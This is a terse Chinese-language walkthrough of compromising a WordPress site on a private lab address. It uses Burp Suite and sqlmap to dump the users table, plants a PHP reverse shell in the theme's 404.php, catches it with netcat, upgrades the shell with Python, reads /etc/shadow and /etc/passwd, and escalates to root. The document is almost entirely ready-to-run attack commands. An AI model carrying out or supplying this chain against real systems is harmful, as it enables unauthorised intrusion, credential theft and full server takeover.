request.raw抓取的数据包头,最高水平最高风险,用Mysql的数据库dbms,不再询问--batch
用Burpsuite抓取,复制包头,gedit request.raw复制进去
sqlmap -r request.raw --level 5 --risk 3 --dbs --dbms mysql --batch
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 --tables --dbms mysql --batch
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 -T users --columns --dbms mysql --batch
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 -T users -C password,username --dump --dbms mysql
http://192.168.1.109:8080/wordpress/wp-login.php
上传webshell获取控制权
wordpress后台寻找上传点
主题的404.php可以上传webshell
webshell获取 /usr/share/webshells/php
php-reverse-shell.php反弹shell
复制到桌面,gedit修改php-reverse-shell.php,
修改ip和端口号,保存复制
上传webshell
启动监听
nc -nlvp port
启动终端
优化shell
python -c "import pty;pty.spawn('/bin/bash')"
访问webshell才能获得反弹shell
http://ip:port/目录/wp-content/themes/主题名/404.php
http://192.168.1.109:8080/wordpress/wp-content/themes/twentythirteen/404.php
获取root权限
cat /etc/shadow cat /etc/passwd查看敏感文件
使用su- 提升root权限